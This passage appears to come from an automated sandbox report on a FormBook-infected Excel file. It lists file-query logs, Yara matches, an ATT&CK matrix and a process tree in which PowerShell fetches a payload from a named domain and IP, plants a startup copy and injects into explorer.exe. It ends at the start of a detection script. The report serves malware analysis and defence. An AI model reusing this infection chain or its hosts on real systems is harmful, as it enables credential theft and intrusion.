          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

MITRE ATT&CK Matrix

Listed per tactic column; digits in parentheses are the per-technique signature-count badges shown in the matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Management Instrumentation (1); Scripting (2); Exploitation for Client Execution (3); PowerShell (3); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
Persistence: Registry Run Keys / Startup Folder (1 1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Privilege Escalation: Process Injection (4 1 2); Registry Run Keys / Startup Folder (1 1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
Defense Evasion: Disable or Modify Tools (1 1); Deobfuscate/Decode Files or Information (1); Scripting (2); Obfuscated Files or Information (3 1); Software Packing (3); Rootkit (1); Masquerading (1 1 1); Virtualization/Sandbox Evasion (5); Process Injection (4 1 2)
Credential Access: Credential API Hooking (1); Input Capture (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: File and Directory Discovery (2); System Information Discovery (1 2 4); Security Software Discovery (2 4 1); Virtualization/Sandbox Evasion (5); Process Discovery (2); Application Window Discovery (1); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Credential API Hooking (1); Input Capture (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (1 1); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (2 2); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

Behavior Graph

Legend (graph icons): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; language (Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other); Is malicious; Internet

Behavior Graph ID: 323692 | Sample: 5901777.xls | Start date: 27/11/2020 | Architecture: WINDOWS | Score: 100

Signatures attached to the sample node: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 12 other signatures

Process tree as drawn in the graph (node numbers in brackets; the bare numbers after a process name are the graph's created-registry-value / created-file counts):

Start: 5901777.xls [2]
  +-- powershell.exe [9] (counts 14, 21)
  |     DNS/IP: sparepartiran.com, 162.223.88.131, ports 49743, 49744, 80 (COLOUPUS, United States)
  |     dropped: C:\Users\Public\oftmhayq.exe, PE32
  |     signatures: Drops PE files to the user root directory; Powershell drops PE file
  |     +-- oftmhayq.exe [18] (counts 4)
  |     |     signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements
  |     |     +-- oftmhayq.exe [30]
  |     |           signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection)
  |     +-- conhost.exe [21]
  +-- powershell.exe [14] (counts 21)
  |     +-- oftmhayq.exe [23] (counts 1, 5)
  |     |     dropped: C:\Users\user\AppData\Roaming\...\vlc.exe, PE32
  |     |     signature: Injects a PE file into a foreign process
  |     |     +-- oftmhayq.exe [33]
  |     |           injected into: explorer.exe [35]
  |     |                 +-- vlc.exe [37] (started by the injected explorer.exe)
  |     +-- conhost.exe [26]
  +-- EXCEL.EXE [16] (counts 27, 22)
        +-- splwow64.exe [28]
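The chain drawn in the behaviour graph above (PowerShell fetching the stage from sparepartiran.com, writing a PE into C:\Users\Public, executing it, a second copy planted under Start Menu\Programs, and the dropper injecting into explorer.exe) is what a detection engineer would turn into rules. The script below is an added example, not part of the Joe Sandbox report: it replays the chain as constructed Sysmon-style events (the event field names, the graph node numbers used as PIDs, and the system-binary paths are assumptions; the drop paths, domain and IP are the ones the graph shows, and the download URL is the one listed under Contacted URLs further down), then runs four rules and a drop-then-execute correlation over them, with one benign control event that must not fire.

```python
import re

# Constructed Sysmon-style events that replay the behaviour graph. Field names
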